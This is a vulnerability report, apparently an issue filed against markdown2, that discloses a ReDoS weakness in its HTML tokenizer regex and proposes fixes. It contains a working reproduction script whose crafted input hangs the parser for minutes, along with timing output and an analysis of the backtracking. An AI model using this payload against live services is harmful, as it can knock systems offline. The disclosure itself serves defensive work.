Potential ReDoS vulnerability in markdown2.py

**Describe the bug**
Hi team, thanks for your great work! I think I found a small vulnerability that could lead to denial of service (DoS).
At line 1265 in `markdown2.py`, the regex `_sorta_html_tokenize_re` is vulnerable to ReDoS when it is used in
`for token in self._sorta_html_tokenize_re.split(text):`

**To Reproduce**
Here is a test script that can be run directly:
```python3
import markdown2
import time

for repeat_count in range(0, 5000, 500):
    # repeat_count copies of `<p m="1"`, then 2 * repeat_count spaces,
    # then an unterminated `</div` so the tag pattern can never complete
    markdown_text = "<p m=\"1\"" * repeat_count + " " * repeat_count + " " * repeat_count + "</div"

    start_time = time.time()
    html_output = markdown2.markdown(markdown_text, extras=["markdown-in-html"])
    end_time = time.time()
    print(f"repeat_count/length: {repeat_count}/{len(markdown_text)} Time taken: {end_time - start_time:.6f} seconds")

```
The output looks like this:
```python3
repeat_count/length: 0/5 Time taken: 0.004103 seconds
repeat_count/length: 500/5005 Time taken: 3.075934 seconds
repeat_count/length: 1000/10005 Time taken: 23.623668 seconds
repeat_count/length: 1500/15005 Time taken: 78.709412 seconds
repeat_count/length: 2000/20005 Time taken: 186.460569 seconds
repeat_count/length: 2500/25005 Time taken: 361.830719 seconds
repeat_count/length: 3000/30005 Time taken: 625.041665 seconds
repeat_count/length: 3500/35005 Time taken: 991.112904 seconds
```


As we can see, the run time grows roughly cubically with input length (doubling the input makes it about 8 times slower), and an input of only about 35k characters makes the program hang for more than **16 minutes**.
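
As a rough check on the growth rate, the reported timings can be plugged into a log-log slope estimate. This is only a back-of-the-envelope sketch: the helper name `growth_exponent` is made up for illustration, and the numbers are copied from the output above.

```python3
import math

# (input length in characters, seconds) copied from the timings reported above
timings = [
    (5005, 3.075934),
    (10005, 23.623668),
    (20005, 186.460569),
]


def growth_exponent(n1, t1, n2, t2):
    """Estimate k in t ~ n**k from two (length, time) measurements."""
    return math.log(t2 / t1) / math.log(n2 / n1)


# Compare each measurement with the next one (each step doubles the length)
exponents = [
    growth_exponent(n1, t1, n2, t2)
    for (n1, t1), (n2, t2) in zip(timings, timings[1:])
]
print([round(k, 2) for k in exponents])
```

Both estimates come out close to 3, which is consistent with polynomial (roughly cubic) rather than linear behaviour.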

**Expected behavior**
I think we could add a limit, for example replacing `\s*` with `\s{0,100}`, or split the regex into multiple sub-regexes. Either might help with the backtracking problem.

For the regex `_sorta_html_tokenize_re`, the issue comes from this sub-pattern:
```python3
              (?:             # attributes
                    \s+                           # whitespace after tag
                    (?:[^\t<>"'=/]+:)?
                    [^<>"'=/]+=                   # attr name
                    (?:".*?"|'.*?'|[^<>"'=/\s]+)  # value, quoted or unquoted. If unquoted, no spaces allowed
                )*
                \s*/?>
```
The `(...)*` group and the trailing `\s*` are both greedy and can match the same whitespace, leading to massive backtracking.
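
To illustrate the overlap, the small check below tests each piece of the quoted sub-pattern in isolation against a run of spaces. It does not measure backtracking. It only shows that several adjacent pieces accept the same characters, so there are many ways to divide a whitespace run between them before the overall match fails. The dictionary keys are labels chosen for this sketch.

```python3
import re

# Character classes and quantifiers taken from the sub-pattern quoted above,
# each compiled on its own (the labels are just for this illustration)
pieces = {
    "leading_ws": re.compile(r"\s+"),
    "ns_prefix_chars": re.compile(r"""[^\t<>"'=/]+"""),
    "attr_name_chars": re.compile(r"""[^<>"'=/]+"""),
    "trailing_ws": re.compile(r"\s*"),
}

run_of_spaces = " " * 10

# Collect every piece that can consume the whole run of spaces by itself
matching = [
    label for label, pattern in pieces.items()
    if pattern.fullmatch(run_of_spaces)
]
print(matching)
```

All four pieces match, because neither negated character class excludes the space character.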

I tried removing each of them from the regex in turn, and performance improved significantly:
```python3
# remove \s*
repeat_count/length: 0/5 Time taken: 0.004091 seconds
repeat_count/length: 500/6005 Time taken: 0.080678 seconds
repeat_count/length: 1000/12005 Time taken: 0.326295 seconds
repeat_count/length: 1500/18005 Time taken: 0.712929 seconds
repeat_count/length: 2000/24005 Time taken: 1.258733 seconds
repeat_count/length: 2500/30005 Time taken: 2.067534 seconds
repeat_count/length: 3000/36005 Time taken: 2.911231 seconds
repeat_count/length: 3500/42005 Time taken: 3.897797 seconds
repeat_count/length: 4000/48005 Time taken: 5.017783 seconds
repeat_count/length: 4500/54005 Time taken: 6.552440 seconds
```

```python3
# remove `(...)*`
repeat_count/length: 0/5 Time taken: 0.004098 seconds
repeat_count/length: 500/6005 Time taken: 0.088631 seconds
repeat_count/length: 1000/12005 Time taken: 0.347793 seconds
repeat_count/length: 1500/18005 Time taken: 0.774725 seconds
repeat_count/length: 2000/24005 Time taken: 1.367911 seconds
repeat_count/length: 2500/30005 Time taken: 2.169432 seconds
repeat_count/length: 3000/36005 Time taken: 3.167773 seconds
repeat_count/length: 3500/42005 Time taken: 4.229510 seconds
repeat_count/length: 4000/48005 Time taken: 5.558357 seconds
repeat_count/length: 4500/54005 Time taken: 6.914844 seconds
```
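
The `\s{0,100}` idea from the Expected behavior section could look roughly like the sketch below. It reuses only the attribute fragment quoted in this issue. The `<\w+` tag opener and the helper `build_tag_re` are assumptions made for the example, not the real `_sorta_html_tokenize_re`, and I have not timed this against the reproduction script.

```python3
import re

# Attribute fragment as quoted in this issue. The "<\w+" opener added in
# build_tag_re is an assumption; the full original regex is not shown here.
ATTRIBUTES = r"""
    (?:                                   # attributes
        \s+                               # whitespace after tag
        (?:[^\t<>"'=/]+:)?
        [^<>"'=/]+=                       # attr name
        (?:".*?"|'.*?'|[^<>"'=/\s]+)      # value, quoted or unquoted
    )*
"""


def build_tag_re(trailing_ws):
    """Hypothetical helper: compile a simplified opening-tag pattern."""
    return re.compile(r"<\w+" + ATTRIBUTES + trailing_ws + r"/?>", re.X)


unbounded = build_tag_re(r"\s*")        # trailing whitespace as in the issue
bounded = build_tag_re(r"\s{0,100}")    # proposed limit on trailing whitespace

ordinary_tag = '<p m="1" >'
padded_tag = '<p m="1"' + " " * 101 + ">"

# Ordinary tags match either way
print(bool(unbounded.fullmatch(ordinary_tag)), bool(bounded.fullmatch(ordinary_tag)))
# A tag with 101 spaces before ">" only matches the unbounded pattern
print(bool(unbounded.fullmatch(padded_tag)), bool(bounded.fullmatch(padded_tag)))
```

The trade-off is that a tag with more than 100 whitespace characters before `>` would no longer be recognised as a tag, and bounding only the trailing whitespace may not remove every source of backtracking, so the reproduction script should be re-run against any real change.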


